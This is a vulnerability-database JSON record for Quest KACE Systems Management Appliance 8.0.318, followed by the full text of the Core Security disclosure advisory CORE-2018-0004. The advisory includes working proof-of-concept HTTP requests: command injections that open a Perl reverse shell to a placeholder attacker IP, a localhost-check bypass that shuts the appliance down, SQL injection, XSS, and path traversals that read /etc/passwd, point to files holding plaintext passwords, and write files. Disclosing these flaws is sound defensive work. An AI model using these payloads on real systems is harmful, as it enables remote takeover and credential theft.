\n\nCore Security is headquartered in the USA with offices and operations in\nSouth America, Europe, Middle East and Asia. To learn more, contact Core\nSecurity at (678) 304-4500 or info@coresecurity.com\n\n12. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2018 Core Security and (c)\n2018 CoreLabs, and are licensed under a Creative Commons Attribution\nNon-Commercial Share-Alike 3.0 (United States) License:\nhttp://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n13. *PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nadvisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-11137"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005410"
},
{
"db": "CNVD",
"id": "CNVD-2018-15642"
},
{
"db": "VULMON",
"id": "CVE-2018-11137"
},
{
"db": "PACKETSTORM",
"id": "148005"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-11137",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005410",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2018-15642",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1217",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "148005",
"trust": 0.2
},
{
"db": "VULMON",
"id": "CVE-2018-11137",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15642"
},
{
"db": "VULMON",
"id": "CVE-2018-11137"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005410"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11137"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1217"
}
]
},
"id": "VAR-201805-0597",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15642"
}
],
"trust": 1.1800866
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15642"
}
]
},
"last_update_date": "2023-12-18T12:01:57.483000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "KACE Systems Management Appliance",
"trust": 0.8,
"url": "https://www.quest.com/products/kace-systems-management-appliance/"
},
{
"title": "Quest KACE System Management Appliance path traversal vulnerability patch",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/137667"
},
{
"title": "Quest KACE System Management Appliance Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=81229"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15642"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005410"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1217"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-22",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-005410"
},
{
"db": "NVD",
"id": "CVE-2018-11137"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.2,
"url": "https://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11137"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-11137"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/22.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/148005/quest-kace-system-management-appliance-8.0-build-8.0.318-xss-traversal-code-execution-sql-injection.html"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11139"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11134"
},
{
"trust": 0.1,
"url": "http://[serverip]/common/download_agent_installer.php?platform=windows\u0026serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f\u0026orgid=1"
},
{
"trust": 0.1,
"url": "http://[serverip]/systemui/settings_network.php"
},
{
"trust": 0.1,
"url": "https://support.quest.com/essentials/reporting-security-vulnerability."
},
{
"trust": 0.1,
"url": "http://[serverip]/adminui/advisory.php?id=10"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11136"
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11135"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11140"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11132"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11133"
},
{
"trust": 0.1,
"url": "https://www.quest.com/products/kace-systems-management-appliance/"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com."
},
{
"trust": 0.1,
"url": "https://support.quest.com/essentials/vulnerability-reporting-acknowledgements)."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11141"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11142"
},
{
"trust": 0.1,
"url": "https://support.quest.com/download-install-detail/6086148."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11138"
},
{
"trust": 0.1,
"url": "http://[serverip]/adminui/analysis_report_list.php?category_id="
},
{
"trust": 0.1,
"url": "http://[serverip]/common/run_cross_report.php?uniqueid=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952"
},
{
"trust": 0.1,
"url": "https://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15642"
},
{
"db": "VULMON",
"id": "CVE-2018-11137"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005410"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11137"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1217"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-15642"
},
{
"db": "VULMON",
"id": "CVE-2018-11137"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005410"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11137"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1217"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-08-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-15642"
},
{
"date": "2018-05-31T00:00:00",
"db": "VULMON",
"id": "CVE-2018-11137"
},
{
"date": "2018-07-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-005410"
},
{
"date": "2018-05-31T20:52:06",
"db": "PACKETSTORM",
"id": "148005"
},
{
"date": "2018-05-31T18:29:00.517000",
"db": "NVD",
"id": "CVE-2018-11137"
},
{
"date": "2018-06-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201805-1217"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-08-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-15642"
},
{
"date": "2018-06-28T00:00:00",
"db": "VULMON",
"id": "CVE-2018-11137"
},
{
"date": "2018-07-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-005410"
},
{
"date": "2018-06-28T13:31:19.123000",
"db": "NVD",
"id": "CVE-2018-11137"
},
{
"date": "2018-06-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201805-1217"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1217"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Quest KACE Systems Management Appliance Path traversal vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-005410"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "path traversal",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201805-1217"
}
],
"trust": 0.6
}
}
VAR-201805-0601
Vulnerability from variot - Updated: 2023-12-18 12:01
The 'IMAGES_JSON' and 'attachments_to_remove[]' parameters of the '/adminui/advisory.php' script in the Quest KACE System Management Virtual Appliance 8.0.318 can be abused to write and delete files respectively via Directory Traversal. Files can be at any location where the 'www' user has write permissions. Quest KACE System Management Virtual Appliance is an IT asset management device from Quest Software, USA. A path traversal vulnerability exists in Quest KACE System Management Virtual Appliance version 8.0.318. An attacker could use the 'IMAGES_JSON' and 'attachments_to_remove[]' parameters to write and delete files with this vulnerability. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/
Quest KACE System Management Appliance Multiple Vulnerabilities
- Advisory Information
Title: Quest KACE System Management Appliance Multiple Vulnerabilities Advisory ID: CORE-2018-0004 Advisory URL: http://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities Date published: 2018-05-31 Date of last update: 2018-05-22 Vendors contacted: Quest Software Inc. Release mode: Forced release
- Vulnerability Information
Class: Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Deserialization of Untrusted Data [CWE-502], Improper Privilege Management [CWE-269], Improper Privilege Management [CWE-269], Improper Authorization [CWE-285], Improper Neutralization of Special Elements used in an SQL Command [CWE-89], Improper Neutralization of Special Elements used in an SQL Command [CWE-89], Improper Neutralization of Input During Web Page Generation [CWE-79], External Control of File Name or Path [CWE-73], External Control of File Name or Path [CWE-73] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2018-11138, CVE-2018-11139, CVE-2018-11135, CVE-2018-11134, CVE-2018-11132, CVE-2018-11142, CVE-2018-11136, CVE-2018-11140, CVE-2018-11133, CVE-2018-11137, CVE-2018-11141
- Vulnerability Description
From Quest KACE's website:
"The KACE Systems Management Appliance [1] provides your growing organization with comprehensive management of network-connected devices, including servers, PCs, Macs, Chromebooks, tablets, printers, storage, networking gear and the Internet of Things (IoT). KACE can fulfill all of your organization's systems management needs, from initial deployment to ongoing management and retirement."
Multiple vulnerabilities were found in the Quest KACE System Management Virtual Appliance that would allow a remote attacker to gain command execution as root. We present three vectors to achieve this, including one that can be exploited as an unauthenticated user.
Additional web application vulnerabilities were found in the web console that is bundled with the product. These vulnerabilities are detailed in section 7.
Note: This advisory has limited details on the vulnerabilities because during the attempted coordinated disclosure process, Quest advised us not to distribute our original findings to the public or else they would take legal action. Quest's definition of "responsible disclosure" can be found at https://support.quest.com/essentials/reporting-security-vulnerability.
CoreLabs has been publishing security advisories since 1997 and believes in coordinated disclosure and good faith collaboration with software vendors before disclosure to help ensure that a fix or workaround solution is ready and available when the vulnerability details are publicized. We believe that providing technical details about each finding is necessary to provide users and organizations with enough information to understand the implications of the vulnerabilities against their environment and, most importantly, to prioritize the remediation activities aiming at mitigating risk.
We regret Quest's posture on disclosure during the whole process (detailed in the Report Timeline section) and the lack of a possibility of engaging into a coordinated publication date, something we achieve (and have achieved) with many vendors as part of our coordinated disclosure practices.
- Vulnerable Packages
. Quest KACE System Management Appliance 8.0 (Build 8.0.318) Other products and versions might be affected too, but they were not tested.
- Vendor Information, Solutions and Workarounds
Quest reports that it has released the security vulnerability patch SEC2018_20180410 to address the reported vulnerabilities. Patch can be download at https://support.quest.com/download-install-detail/6086148.
For more details, Quest published the following Security Note: https://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-
- Credits
These vulnerabilities were discovered and researched by Leandro Barragan and Guido Leo from Core Security Consulting Services. The publication of this advisory was coordinated by Leandro Cuozzo from Core Advisories Team.
- Technical Description / Proof of Concept Code
Quest KACE SMA ships with a web console that provides administrators and users with several features. Multiple vulnerabilities were found in the context of this console, both from an authenticated and unauthenticated perspective.
Section 7.1 describes how an unauthenticated attacker could gain command execution on the system as the web server user.
Vulnerabilities described in 7.2 and 7.3 could also be abused to gain code execution but would require the attacker to have a valid authentication token.
In addition, issues found in the Sudo Server module presented in 7.4 and 7.5 would allow the attacker to elevate his privileges from the web server user to root, effectively obtaining full control of the device.
Additional web application vulnerabilities were found in the console, such as insufficient authorization for critical functions, which would allow an anonymous attacker to reconfigure the appliance (7.6), SQL injection vulnerabilities (7.7, 7.8), a cross-site scripting issue (7.9), and path traversal vulnerabilities, which would allow an attacker to read, write and delete arbitrary files (7.10, 7.11).
7.1. Unauthenticated command injection
[CVE-2018-11138] The '/common/download_agent_installer.php' script is accessible to anonymous users in order to download an agent for a specific platform. This behavior can be abused to execute arbitrary commands on the system.
The script receives the following parameters via the GET method:
. platform: Indicates the platform in which the agent is going to be installed . serv: SHA256 hash of a fixed value that depends of each appliance . orgid: Organization ID . version: Version number of the agent
The last two conditions are simple to meet. The Agent versions are publicly available within the Quest KACE site, but even if they were not, we found that the Organization ID parameter is vulnerable to a time based SQL injection (refer to issue 7.7). This would make it possible to obtain the agent version by querying the table 'CLIENT_DISTRIBUTION' and fetching the contents of the 'VERSION' column. The Organization ID is 1 by default, but could be obtained in the same way as the Agent version by querying the table 'ORGANIZATION' and the column 'ID'.
As stated above, the application uses the Organization ID and Agent version parameters to execute commands. This means we need to find a way to append system commands within the Organization ID, without breaking the SQL query. If we use the comment symbol (#), we can append anything we want without affecting the result of the query.
Preparing payload:
/----- - platform = windows - serv = ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c - orgid = 1#;perl -e 'use Socket;$i="[AttackerIP]";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'; - version = 8.0.152 (last agent version available for windows) -----/
The following proof of concept executes a reverse shell:
/----- GET /common/download_agent_installer.php?platform=windows&serv=ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c&orgid=1%23%3bperl+-e+'use+Socket%3b$i%3d"[AttackerIP]"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/sh+-i")%3b}%3b'%3b&version=8.0.152 HTTP/1.1 Host: Server Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 0 -----/
/----- $ nc -lvp 8080 Listening on [0.0.0.0] (family 0, port 8080) Connection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2, sport 20050) sh: can't access tty; job control turned off $ id uid=80(www) gid=80(www) groups=80(www) -----/
7.2. Authenticated command injection
[CVE-2018-11139] The '/common/ajax_email_connection_test.php' script used to test the configured SMTP server is accessible by any authenticated user and can be abused to execute arbitrary commands on the system. This script is vulnerable to command injection via the unsanitized user input 'TEST_SERVER' sent to the script via POST method.
The following proof of concept executes a reverse shell:
/----- POST /common/ajax_email_connection_test.php HTTP/1.1 Host: [ServerIP] Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 416 Cookie: [Cookie] Connection: close
TEST_SERVER=test;perl+-e+'use+Socket%3b$i%3d"[AttackerIP]"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/sh+-i")%3b}%3b';&TEST_PORT=587&TEST_USERNAME=eaea@eaea.com&TEST_PASSWORD=1234&TEST_OLD_PASSWORD=&QUEUE_ID=1&TEST_TO_EMAIL=eaea@eaea.com&ACTION=TEST_CONNECTION_SMTP -----/
/----- $ nc -lvp 8080 Listening on [0.0.0.0] (family 0, port 8080) Connection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2, sport 20050) sh: can't access tty; job control turned off $ id uid=80(www) gid=80(www) groups=80(www) -----/
7.3. PHP Object Injection leading to arbitrary command execution
[CVE-2018-11135] An authenticated user could abuse a deserialization call on the script '/adminui/error_details.php' to inject arbitrary PHP objects.
To exploit this issue, the parameter 'ERROR_MESSAGES' needs to be an array and meet some specific conditions in order to successfully exploit the issue.
7.4. Privilege escalation via password change in Sudo Server
[CVE-2018-11134] In order to perform actions that requires higher privileges, the application relies on a message queue managed that runs with root privileges and only allows a set of commands.
One of the available commands allows to change any user's password (including root).
Assuming we are able to run commands in the server, we could abuse this feature by changing the password of the 'kace_support' account, which comes disabled by default but has full sudo privileges.
7.5. Privilege escalation via command injection in Sudo Server
[CVE-2018-11132] As mentioned in the issue [7.4], in order to perform actions that require higher privileges, the application relies on a message queue that runs daemonized with root privileges and only allows a set of commands to be executed.
A command injection vulnerability exists within this message queue which allows us to append arbitrary commands that will be run as root.
7.6. Insufficient Authorization for critical function
[CVE-2018-11142] 'systemui/settings_network.php' and 'systemui/settings_patching.php' scripts are accessible only from localhost. This restriction can be bypassed by modifying the 'Host' and 'X_Forwarded_For' HTTP headers.
The following proof of concept abuses this vulnerability to shutdown the server as an anonymous user:
/----- POST /systemui/settings_network.php HTTP/1.1 Host: localhost X-Forwarded-For: ::1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://[ServerIp]/systemui/settings_network.php Content-Type: multipart/form-data; boundary=---------------------------5642543667001619951434940129 Content-Length: 3418 Connection: close Upgrade-Insecure-Requests: 1
-----------------------------5642543667001619951434940129 Content-Disposition: form-data; name="CSRF_TOKEN" -----------------------------5642543667001619951434940129 Content-Disposition: form-data; name="$shutdown" DoIt! Content-Disposition: form-data; name="save" Save -----------------------------5642543667001619951434940129-- -----/
7.7. Unauthenticated SQL Injection in download_agent_installer.php
[CVE-2018-11136] The 'orgID' parameter received by the '/common/download_agent_installer.php' script is not sanitized, leading to SQL injection. In particular, a blind time based type.
The following proof of concept induces a time delay:
/----- http://[ServerIP]/common/download_agent_installer.php?platform=windows&serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f&orgid=1 AND SLEEP(10)%23;&version=8.0.152 -----/
7.8. SQL Injection in run_report.php
[CVE-2018-11140] The 'reportID' parameter received by the '/common/run_report.php' script is not sanitized, leading to SQL injection. In particular, an error based type.
The following proof of concept retrieves the current database name:
/----- POST /common/run_report.php HTTP/1.1 Content-Length: 161 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: [ServerIP] Accept: text/html,application/xhtml xml,application/xml;q=0.9,/;q=0.8 Connection: close Referer: http://[ServerIP]/adminui/analysis_report_list.php?CATEGORY_ID= Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Cookie: [Cookie]
date=1516135247598&reportId=-3161+UNION+ALL+SELECT+CONCAT(0x7170706a71,IFNULL(CAST(DATABASE()+AS+CHAR),0x20),0x716a707171),NULL--+LhEx&reportName=&format=pdf -----/
/----- HTTP/1.1 200 OK Date: Thu, 08 Feb 2018 21:50:21 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Access-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key, x-kace-auth-signature, accept, origin, content-type Access-Control-Allow-Origin: * Access-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS X-KACE-Appliance: K1000 X-KACE-Host: [ServerIP] X-KACE-Version: 8.0.318 X-KBOX-WebServer: [ServerIP] X-KBOX-Version: 8.0.318 X-KACE-WebServer: [ServerIP] X-UA-Compatible: IE=9,EDGE Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform Content-Length: 3548 Connection: close Content-Type: text/html; charset=utf-8
[...SNIPPED...]
<![endif]-->Report Queued: qppjqORG1qjpqq<meta http-equiv='refresh' [...SNIPPED...] -----/
7.9. Unauthenticated Cross Site Scripting in run_cross_report.php
[CVE-2018-11133] The 'fmt' parameter of the '/common/run_cross_report.php' script is vulnerable to cross-site scripting.
The following proof of concept demonstrates the vulnerability:
/----- http://[ServerIP]/common/run_cross_report.php?uniqueId=366314513&id=585&org=1&fmt=xls34403')%3balert(1)%2f%2f952 -----/
7.10. Path traversal in download_attachment.php
[CVE-2018-11137] The following proof of concept reads the '/etc/passwd' file. No administrator privileges are needed to execute this script.
It is worth noting that there are several interesting files that can be read with 'www' privileges, such as all the files located in '/kbox/bin/koneas/keys/' and '/kbox/kboxwww/include/globals.inc', which contain plaintext passwords.
/----- http://[ServerIP]/common/run_cross_report.php?uniqueId=366314513&id=585&org=1&fmt=xls34403')%3balert(1)%2f%2f952 -----/
The following proof of concept demonstrates the vulnerability:
/----- GET /common/download_attachment.php?checksum=/../../../../../../../../../../../etc/passwd&filename= HTTP/1.1 Host: [ServerIP] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: [Cookie] Connection: close Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK Date: Thu, 18 Jan 2018 17:18:19 GMT Server: Apache Cache-Control: must-revalidate, post-check=0, pre-check=0 Expires: -1 Pragma: public Content-Disposition: attachment; filename="" Content-Transfer-Encoding: Binary Content-Description: K1000 attachment Content-Length: 2400 Access-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key, x-kace-auth-signature, accept, origin, content-type Access-Control-Allow-Origin: * Access-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS X-KACE-Appliance: K1000 X-KACE-Host: k10000. X-KACE-Version: 8.0.318 X-KBOX-WebServer: k10000. X-KBOX-Version: 8.0.318 X-KACE-WebServer: k10000. X-UA-Compatible: IE=9,EDGE Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform Connection: close Content-Type: application/octet-stream
$FreeBSD: releng/11.0/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $
root::0:0:Charlie &:/root:/bin/csh daemon::1:1:Owner of many system processes:/root:/usr/sbin/nologin operator::2:5:System &:/:/usr/sbin/nologin bin::3:7:Binaries Commands and Source:/:/usr/sbin/nologin tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin[...SNIPPED...] -----/
7.11. Path traversal in advisory.php
[CVE-2018-11141] The following proof of concept creates a file located at '/kbox/kboxwww/resources/TestWrite' with the content 'Sarasa' (base64 encoded).
File deletion could be abused to delete '/kbox/kboxwww/systemui/reports/setup_completed.log' file. This file's existence defines if the appliance setup wizard is shown or not.
The following proof of concept demonstrates the vulnerability:
/----- POST /adminui/advisory.php?ID=10 HTTP/1.1 Host: [ServerIP] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://[ServerIP]/adminui/advisory.php?ID=10 Content-Type: multipart/form-data; boundary=---------------------------2671551246366368501556269100 Content-Length: 1705 Cookie: [Cookie] Connection: close Upgrade-Insecure-Requests: 1
-----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="CSRF_TOKEN"
99c2addf067719d6fc3ae32ded351f000af8efdd091f162baa2a34516cefecc741cb13a69c80554a9ba32908d1c683102d3455eac39bcafc8854f46a04b2044e -----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="IMAGES_JSON"
{"/../../../resources/TestWrite":"aaaaaa,VGVzdENvbnRlbnQ="} -----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="FARRAY[ID]" [...SNIPPED...] -----/
Taking advantage of 7.2 and 7.4 we are able to verify the file creation:
/----- [root@k10000 /kbox/kboxwww/resources]# ls -lha total 32 drwxr-xr-x 2 www wheel 512B Feb 9 20:40 . drwxr-xr-x 23 root wheel 512B Nov 14 18:29 .. -rw-r--r-- 1 www wheel 11B Feb 9 20:40 TestWrite -----/
-
Report Timeline 2018-02-26: Core Security (Core) sent an initial notification to Quest Software Inc. (Quest) via web form. 2018-03-05: Quest Support confirmed the receipt and requested additional information. 2018-03-12: Core Security sent a draft advisory including a technical description. 2018-03-16: Quest Support asked for the CVE-IDs. 2018-03-16: Core Security answered saying that the CVE-IDs are required once the vendor verifies the vulnerabilities. Additionally, Core Security requested a confirmation about the reported vulnerabilities and a tentative timescale to fix them. Finally, Core Security requested that Quest use Core's advisories-publication email address as the official communication channel also copying the researchers behind this discovery. 2018-03-16: Quest Support thanked Core's reply and stated it will be in touch during the process. 2018-03-20: Quest Support informed that they had not yet received any updates from the engineering team and had requested one. 2018-03-21: Quest Support requested information about the KACE version used for reporting the issues and also Core's company name and information. 2018-03-21: Core replied with the affected version (that was included in the original draft advisory) and a link to the Core company website and the list of previous security advisories. 2018-03-21: Quest Support acknowledged the information provided. 2018-03-26: Quest's KACE product manager (PM) thanked Core for making it aware of the security issues found and the level of thoroughness and details provided. Quest specified it had fixes already in place for some of the issues. Quest's KACE PM asked for a conference call in order to understand more about Core's offerings for future engagements. Finally, Quest's KACE PM notified that the work done by Core is in breach of its license agreement, and requested Core not to distribute the findings to the public, otherwise Quest would take legal action. 
2018-04-13: Quest's KACE PM sent a follow up email and informed that it made a hotfix to patch the reported vulnerabilities. Quest also requested a call meeting to understand future opportunities based on the Core's company capabilities. Finally, Quest asked for information about the researcher that found the vulnerabilities and a link of Core's choosing in order to be included in Quest's Acknowledgment page (https://support.quest.com/essentials/vulnerability-reporting-acknowledgements). 2018-04-16: Core answered email from 2018-03-26 stating the company is following standard practices with regards to coordinated vulnerability disclosure, and also sent detailed technical information about our findings at Quest's request. Core also mentioned Quest seems to be well versed in the disclosure process and expects vendors to coordinate with it prior to publication via Quest's vulnerability reporting process, and that Quest's legal threat appears to be in direct contradiction to the disclosure process that they encourage on their website. Finally, Core asked about Quest's intention to work collaboratively to address these vulnerabilities and to follow industry standard disclosure processes that involves publication of the vulnerabilities. 2018-04-17: Quest's KACE PM replied saying it is willing to collaborate and is looking forward to having a conversation over the phone in order to continue the next steps in its vulnerability process (forwarded email from 2018-04-13). 2018-04-17: Core thanked the answer and stated the willingness of keeping written communications between parties in order to better document the process and communicated the next steps of the process including: 1. Testing the fix (if vendor agrees), 2. Get CVE-IDs, 3. Get a Vendor's link to be included in the advisory and finally 4. Send final advisory version to vendor and coordinate publication date together. 
With regards to Quest's requests, Core provided the researchers names and URL of the advisory when it will be published. Finally, Core stated that the request for other Core company services could be forwarded to the Core services team if needed (and asked the right contact at Quest) but our intention is to keep that services request separate from the coordinated disclosure process. 2018-04-18: Quest Support informed that they had publicly made available patches for its customers and unilaterally closed the case. 2018-05-31: Advisory CORE-2018-0004 published.
-
References
[1] https://www.quest.com/products/kace-systems-management-appliance/
- About CoreLabs
